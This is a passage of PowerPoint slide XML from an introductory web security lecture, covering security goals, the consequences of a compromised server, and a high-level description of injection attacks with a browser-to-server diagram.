          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7F5553-3F15-C244-B41D-CC59C8AED23D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Confidentiality  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious web sites should not be able to learn confidential information from  my computer or other web sites</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0964B482-A57C-D94A-B7CB-7846748C2E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="274638"/>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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6065797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092352-2C80-BD49-90E4-5C8FFE992487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7F5553-3F15-C244-B41D-CC59C8AED23D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Privacy    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious web sites should not be able to spy on me or my activities online</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker cannot make web sites unavailable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0964B482-A57C-D94A-B7CB-7846748C2E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="274638"/>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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17507981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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5DB4FC-2855-DB42-9072-55BD7E0D1693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="259080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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security: Server Side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1422564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43DB08-DB78-5D45-A7FB-1CBF2BEB15C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Compromised Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F95DD5A8-31F8-E045-AACF-6C6299DFF664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal sensitive data (e.g., data from many users)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change server data (e.g., affect users)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gateway to enabling attacks on clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonation (of users to servers, or vice versa)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Others…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9290957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637A6-7AF5-ED4E-ADA3-A2C804EDBEC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Injection Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E4B5F6D-1DB9-B241-94DC-722555FC5FA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Attacker user provides malicious inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Web server does not check input format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables attacker to execute arbitrary code on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21826854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3276600" y="2057400"/>
            <a:ext cx="2667000" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2667000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2666999" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2036422"/>
            <a:ext cx="57785" cy="42545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57785" h="42544">
                <a:moveTo>
                  <a:pt x="0" y="41953"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57633" y="20976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41953"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2036422"/>
            <a:ext cx="57785" cy="42545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57785" h="42544">
                <a:moveTo>
                  <a:pt x="0" y="41953"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57633" y="20976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41953"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="1752600"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4445" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3550">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="835660" marR="828040" indent="-635" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Web  server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3679826" y="1691642"/>
            <a:ext cx="1305560" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Form</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5402659" y="2986486"/>
            <a:ext cx="121920" cy="121920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="121920" h="121919">
                <a:moveTo>
                  <a:pt x="0" y="121840"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="24367" y="24368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="121840"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CBCBCB"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619500" y="2133601"/>
            <a:ext cx="1905000" cy="974725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905000" h="974725">
                <a:moveTo>
                  <a:pt x="1783159" y="974724"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1807527" y="877252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904999" y="852884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1783159" y="974724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="974724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904999" y="852884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3701269" y="2079984"/>
            <a:ext cx="1741170" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>command.php?  arg1=x&amp;arg2=  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093740" y="1703340"/>
            <a:ext cx="2260600" cy="1733550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1752600"/>
            <a:ext cx="2108199" cy="1581149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2514600"/>
            <a:ext cx="703580" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="703580" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="703262" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="703262" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136650" y="1746250"/>
            <a:ext cx="2120900" cy="1593850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="2540" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1089025">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="4953000"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
